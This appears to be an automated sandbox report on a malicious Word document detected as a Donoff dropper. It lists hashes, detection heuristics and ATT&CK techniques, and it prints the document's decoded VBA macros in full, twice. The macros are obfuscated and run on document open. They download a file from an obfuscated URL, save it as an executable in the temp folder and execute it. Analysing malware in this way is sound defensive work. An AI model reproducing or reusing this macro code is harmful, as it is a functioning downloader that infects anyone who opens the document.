Office (OLE) malware analysis — malicious · 2d59daf9e330e817

MALICIOUS

Office (OLE)

71.5 KB Created: 2016-05-17 22:02:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: 646f6583c2b65265cd8c26a1c2c49047 SHA-1: ae507287f023f950efd5d72bbc44b99a94475afe SHA-256: 2d59daf9e330e817a297c2a063103aa719aa8a20efd7cdb60dce2bf3077a3727

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute code using WScript.Shell and CreateObject, indicating it likely downloads and executes a second-stage payload. The embedded VBA script uses `CreateObject("MSXML2.ServerXMLHTTP.6.0")` to facilitate network communication, likely for payload retrieval.

Heuristics 9

ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Public Function iYGruGhgWm() As Object
Set iYGruGhgWm = CreateObject("WScript.Shell")
End Function

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Public Function jHWFplmh() As Object
Set icSBEYxalI = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set jHWFplmh = icSBEYxalI

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

Public Sub TbjoWgmC(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String)
CallByName OPKCDm, iPjUlAJKt, 1
End Sub

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
ZDBNJCT.uahKxRznq

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5493 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5493 bytes
SHA-256: `3243f5a62fe400286580ebdd9112387e0a30968b4136297f49a364cfc6f7bcfb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ZDBNJCT.uahKxRznq End Sub Attribute VB_Name = "IqsEvVbZxP" Public Function RDEFp(ByVal LaRBS As String, ByVal rRwluV As String) As String RDEFp = LaRBS & rRwluV End Function Public Function SeHohPU(ByVal txztW As String, ByVal nNaoIseJGp As String) As Boolean SeHohPU = InStr(1, txztW, nNaoIseJGp) End Function Public Function zAcxRvafyG(ByVal txztW As String) As Integer zAcxRvafyG = Len(txztW) End Function Public Function fTkmoHQuSF(ByVal txztW As String, ByVal LZjbxfhur As Integer) As String fTkmoHQuSF = Mid(txztW, LZjbxfhur, 1) End Function Attribute VB_Name = "UEKUYyuL" Public Function TTOtgzhRy(ByVal cajXXile As String, ByVal ZEGWP As String) As String Dim auQmA As Boolean For LZjbxfhur = 1 To IqsEvVbZxP.zAcxRvafyG(cajXXile) auQmA = IqsEvVbZxP.SeHohPU(ZEGWP, IqsEvVbZxP.fTkmoHQuSF(cajXXile, LZjbxfhur)) If Not auQmA Then TTOtgzhRy = IqsEvVbZxP.RDEFp(TTOtgzhRy, IqsEvVbZxP.fTkmoHQuSF(cajXXile, LZjbxfhur)) End If Next End Function Attribute VB_Name = "wHCMPuY" Public Sub TbjoWgmC(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String) CallByName OPKCDm, iPjUlAJKt, 1 End Sub Public Function jHWFplmh() As Object Set icSBEYxalI = CreateObject("MSXML2.ServerXMLHTTP.6.0") Set jHWFplmh = icSBEYxalI End Function Public Function ioYcH(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal yYuUhED As String) As Variant Set ioYcH = CallByName(OPKCDm, iPjUlAJKt, 2, yYuUhED) End Function Public Function iYGruGhgWm() As Object Set iYGruGhgWm = CreateObject("WScript.Shell") End Function Public Function bZdCWPoG(ByVal OPKCDm As Object, ByVal xjlhPu As String) As Variant bZdCWPoG = CallByName(OPKCDm, xjlhPu, 2) End Function Public Sub VcaMM(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal JnNsHEEoG As Variant, ByVal PLuoIcOy As Variant) CallByName OPKCDm, iPjUlAJKt, 1, JnNsHEEoG, PLuoIcOy End Sub Public Sub RctPwECJyK(ByVal OPKCDm As Object, ByVal xjlhPu As String, ByVal GLzaGe As Variant) CallByName OPKCDm, xjlhPu, 4, GLzaGe End Sub Public Sub GDFKTBbEIT(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal JnNsHEEoG As Variant, ByVal PLuoIcOy As Variant, ByVal YjNtZXXbY As Variant) CallByName OPKCDm, iPjUlAJKt, 1, JnNsHEEoG, PLuoIcOy, YjNtZXXbY End Sub Public Sub EZoIPSKoR(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal yYuUhED As Variant) CallByName OPKCDm, iPjUlAJKt, 1, yYuUhED End Sub Public Function dICxPnkVcU() As Object Set dICxPnkVcU = CreateObject("ADODB.Stream") End Function Attribute VB_Name = "ZDBNJCT" Private Function JklKxwR() As String JklKxwR = UEKUYyuL.TTOtgzhRy("CDlDoDKseK", "OKD") End Function Private Sub JuDJpZye(ByVal RIuQMsrDev As String, ByVal tQglOjEMNO As String) Set RkwKHCbsZ = wHCMPuY.jHWFplmh wHCMPuY.GDFKTBbEIT RkwKHCbsZ, LdfciyuNu, HevniUQ, RIuQMsrDev, False wHCMPuY.VcaMM RkwKHCbsZ, rbeRXmUU, UEKUYyuL.TTOtgzhRy("2UhszejrB-Ahg2e2jnt2", "2hBjz"), UEKUYyuL.TTOtgzhRy("M3onnz3ilnlVaV3/n4V.30 V(3cVoVm33p3atninbnVl3e;V)3", "3nV") wHCMPuY.TbjoWgmC RkwKHCbsZ, UEKUYyuL.TTOtgzhRy("TSe4n4Jd", "JTDy4U") qdOiHiUy tQglOjEMNO, wHCMPuY.bZdCWPoG(RkwKHCbsZ, UEKUYyuL.TTOtgzhRy("kRecusUpuoUnus5eBcouduuy", "KkUc5u")) End Sub Private Function zQIbVmcK() As String zQIbVmcK = UEKUYyuL.TTOtgzhRy("TB8E8MPG", "8BGu") End Function Private Sub qdOiHiUy(ByVal tQglOjEMNO As String, ByVal QnrkFzn As Variant) Set HutpcnSz = wHCMPuY.dICxPnkVcU wHCMPuY.RctPwECJyK HutpcnSz, UEKUYyuL.TTOtgzhRy("TqyOp9eO", "Oq9"), 1 wHCMPuY.TbjoWgmC HutpcnSz, UEKUYyuL.TTOtgzhRy("OAApeQnC", "AC9QL") wHCMPuY.EZoIPSKoR HutpcnSz, UEKUYyuL.TTOtgzhRy("pWdrdiptpe", "pdxu4"), QnrkFzn wHCMPuY.VcaMM HutpcnSz, UEKUYyuL.TTOtgzhRy("bS.avwueuTuoF.i.ulwe", "w.bu"), tQglOjEMNO, 2 wHCMPuY.TbjoWgmC HutpcnSz, JklKxwR End Sub Private Function DiZSxKj() As String DiZSxKj = UEKUYyuL.TTOtgzhRy("hf5ttffp:Y5//5hfkY-YkYi55tfsufkYiY.55coYYm5/5sYysffteYmYY/YcYafcYhe5/5Yu5pYdYaftef.Yef5xef", "Y5f") End Function Private Function HevniUQ() As String HevniUQ = UEKUYyuL.TTOtgzhRy("mGEmTs", "rFmsq") End Function Private Function ekeuY() As String ekeuY = UEKUYyuL.TTOtgzhRy("9En9Avi roA9n me nAt ", "9A ") End Function Private Function JoCJwPZQ(ByVal JFNmqAdA As String) As String Set AMcdgJXVb = wHCMPuY.ioYcH(wHCMPuY.iYGruGhgWm, ekeuY, ExydJpsv) JoCJwPZQ = AMcdgJXVb(JFNmqAdA) End Function Private Function lTsHPVqJU() As String lTsHPVqJU = UEKUYyuL.TTOtgzhRy("/2c24HS5a1Hab1c22c3HS50SSa1.2exSSe", "H21S") End Function Public Sub uahKxRznq() YFZGFp End Sub Private Function LdfciyuNu() As String LdfciyuNu = UEKUYyuL.TTOtgzhRy("OAApeQnC", "AC9QL") End Function Private Function ExydJpsv() As String ExydJpsv = UEKUYyuL.TTOtgzhRy("PZRlOibCZExSSo", "ixZbol") End Function Private Sub mVggWiBl(ByVal EHuEIJsaEI As String) wHCMPuY.EZoIPSKoR wHCMPuY.iYGruGhgWm, UEKUYyuL.TTOtgzhRy("qExqegqc", "qBg"), EHuEIJsaEI End Sub Private Function rbeRXmUU() As String rbeRXmUU = UEKUYyuL.TTOtgzhRy("S6Met66ReMqM6uMesMbtbHMeMadMeMbr", "M6b") End Function Private Sub YFZGFp() On Error GoTo qVrIPck JuDJpZye DiZSxKj, elCAWm mVggWiBl elCAWm Exit Sub qVrIPck: End Sub Private Function elCAWm() As String elCAWm = JoCJwPZQ(zQIbVmcK) & lTsHPVqJU End Function

SHA-256: 3243f5a62fe400286580ebdd9112387e0a30968b4136297f49a364cfc6f7bcfb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
ZDBNJCT.uahKxRznq
End Sub

Attribute VB_Name = "IqsEvVbZxP"
Public Function RDEFp(ByVal LaRBS As String, ByVal rRwluV As String) As String
RDEFp = LaRBS & rRwluV
End Function
Public Function SeHohPU(ByVal txztW As String, ByVal nNaoIseJGp As String) As Boolean
SeHohPU = InStr(1, txztW, nNaoIseJGp)
End Function
Public Function zAcxRvafyG(ByVal txztW As String) As Integer
zAcxRvafyG = Len(txztW)
End Function
Public Function fTkmoHQuSF(ByVal txztW As String, ByVal LZjbxfhur As Integer) As String
fTkmoHQuSF = Mid(txztW, LZjbxfhur, 1)
End Function

Attribute VB_Name = "UEKUYyuL"
Public Function TTOtgzhRy(ByVal cajXXile As String, ByVal ZEGWP As String) As String
Dim auQmA As Boolean
For LZjbxfhur = 1 To IqsEvVbZxP.zAcxRvafyG(cajXXile)
auQmA = IqsEvVbZxP.SeHohPU(ZEGWP, IqsEvVbZxP.fTkmoHQuSF(cajXXile, LZjbxfhur))
If Not auQmA Then
TTOtgzhRy = IqsEvVbZxP.RDEFp(TTOtgzhRy, IqsEvVbZxP.fTkmoHQuSF(cajXXile, LZjbxfhur))
End If
Next
End Function

Attribute VB_Name = "wHCMPuY"
Public Sub TbjoWgmC(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String)
CallByName OPKCDm, iPjUlAJKt, 1
End Sub
Public Function jHWFplmh() As Object
Set icSBEYxalI = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set jHWFplmh = icSBEYxalI
End Function
Public Function ioYcH(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal yYuUhED As String) As Variant
Set ioYcH = CallByName(OPKCDm, iPjUlAJKt, 2, yYuUhED)
End Function
Public Function iYGruGhgWm() As Object
Set iYGruGhgWm = CreateObject("WScript.Shell")
End Function
Public Function bZdCWPoG(ByVal OPKCDm As Object, ByVal xjlhPu As String) As Variant
bZdCWPoG = CallByName(OPKCDm, xjlhPu, 2)
End Function
Public Sub VcaMM(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal JnNsHEEoG As Variant, ByVal PLuoIcOy As Variant)
CallByName OPKCDm, iPjUlAJKt, 1, JnNsHEEoG, PLuoIcOy
End Sub
Public Sub RctPwECJyK(ByVal OPKCDm As Object, ByVal xjlhPu As String, ByVal GLzaGe As Variant)
CallByName OPKCDm, xjlhPu, 4, GLzaGe
End Sub
Public Sub GDFKTBbEIT(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal JnNsHEEoG As Variant, ByVal PLuoIcOy As Variant, ByVal YjNtZXXbY As Variant)
CallByName OPKCDm, iPjUlAJKt, 1, JnNsHEEoG, PLuoIcOy, YjNtZXXbY
End Sub
Public Sub EZoIPSKoR(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal yYuUhED As Variant)
CallByName OPKCDm, iPjUlAJKt, 1, yYuUhED
End Sub
Public Function dICxPnkVcU() As Object
Set dICxPnkVcU = CreateObject("ADODB.Stream")
End Function

Attribute VB_Name = "ZDBNJCT"
Private Function JklKxwR() As String
JklKxwR = UEKUYyuL.TTOtgzhRy("CDlDoDKseK", "OKD")
End Function
Private Sub JuDJpZye(ByVal RIuQMsrDev As String, ByVal tQglOjEMNO As String)
Set RkwKHCbsZ = wHCMPuY.jHWFplmh
wHCMPuY.GDFKTBbEIT RkwKHCbsZ, LdfciyuNu, HevniUQ, RIuQMsrDev, False
wHCMPuY.VcaMM RkwKHCbsZ, rbeRXmUU, UEKUYyuL.TTOtgzhRy("2UhszejrB-Ahg2e2jnt2", "2hBjz"), UEKUYyuL.TTOtgzhRy("M3onnz3ilnlVaV3/n4V.30 V(3cVoVm33p3atninbnVl3e;V)3", "3nV")
wHCMPuY.TbjoWgmC RkwKHCbsZ, UEKUYyuL.TTOtgzhRy("TSe4n4Jd", "JTDy4U")
qdOiHiUy tQglOjEMNO, wHCMPuY.bZdCWPoG(RkwKHCbsZ, UEKUYyuL.TTOtgzhRy("kRecusUpuoUnus5eBcouduuy", "KkUc5u"))
End Sub
Private Function zQIbVmcK() As String
zQIbVmcK = UEKUYyuL.TTOtgzhRy("TB8E8MPG", "8BGu")
End Function
Private Sub qdOiHiUy(ByVal tQglOjEMNO As String, ByVal QnrkFzn As Variant)
Set HutpcnSz = wHCMPuY.dICxPnkVcU
wHCMPuY.RctPwECJyK HutpcnSz, UEKUYyuL.TTOtgzhRy("TqyOp9eO", "Oq9"), 1
wHCMPuY.TbjoWgmC HutpcnSz, UEKUYyuL.TTOtgzhRy("OAApeQnC", "AC9QL")
wHCMPuY.EZoIPSKoR HutpcnSz, UEKUYyuL.TTOtgzhRy("pWdrdiptpe", "pdxu4"), QnrkFzn
wHCMPuY.VcaMM HutpcnSz, UEKUYyuL.TTOtgzhRy("bS.avwueuTuoF.i.ulwe", "w.bu"), tQglOjEMNO, 2
wHCMPuY.TbjoWgmC HutpcnSz, JklKxwR
End Sub
Private Function DiZSxKj() As String
DiZSxKj = UEKUYyuL.TTOtgzhRy("hf5ttffp:Y5//5hfkY-YkYi55tfsufkYiY.55coYYm5/5sYysffteYmYY/YcYafcYhe5/5Yu5pYdYaftef.Yef5xef", "Y5f")
End Function
Private Function HevniUQ() As String
HevniUQ = UEKUYyuL.TTOtgzhRy("mGEmTs", "rFmsq")
End Function
Private Function ekeuY() As String
ekeuY = UEKUYyuL.TTOtgzhRy("9En9Avi  roA9n me nAt ", "9A ")
End Function
Private Function JoCJwPZQ(ByVal JFNmqAdA As String) As String
Set AMcdgJXVb = wHCMPuY.ioYcH(wHCMPuY.iYGruGhgWm, ekeuY, ExydJpsv)
JoCJwPZQ = AMcdgJXVb(JFNmqAdA)
End Function
Private Function lTsHPVqJU() As String
lTsHPVqJU = UEKUYyuL.TTOtgzhRy("/2c24HS5a1Hab1c22c3HS50SSa1.2exSSe", "H21S")
End Function
Public Sub uahKxRznq()
YFZGFp
End Sub
Private Function LdfciyuNu() As String
LdfciyuNu = UEKUYyuL.TTOtgzhRy("OAApeQnC", "AC9QL")
End Function
Private Function ExydJpsv() As String
ExydJpsv = UEKUYyuL.TTOtgzhRy("PZRlOibCZExSSo", "ixZbol")
End Function
Private Sub mVggWiBl(ByVal EHuEIJsaEI As String)
wHCMPuY.EZoIPSKoR wHCMPuY.iYGruGhgWm, UEKUYyuL.TTOtgzhRy("qExqegqc", "qBg"), EHuEIJsaEI
End Sub
Private Function rbeRXmUU() As String
rbeRXmUU = UEKUYyuL.TTOtgzhRy("S6Met66ReMqM6uMesMbtbHMeMadMeMbr", "M6b")
End Function
Private Sub YFZGFp()
On Error GoTo qVrIPck
JuDJpZye DiZSxKj, elCAWm
mVggWiBl elCAWm
Exit Sub
qVrIPck:
End Sub
Private Function elCAWm() As String
elCAWm = JoCJwPZQ(zQIbVmcK) & lTsHPVqJU
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.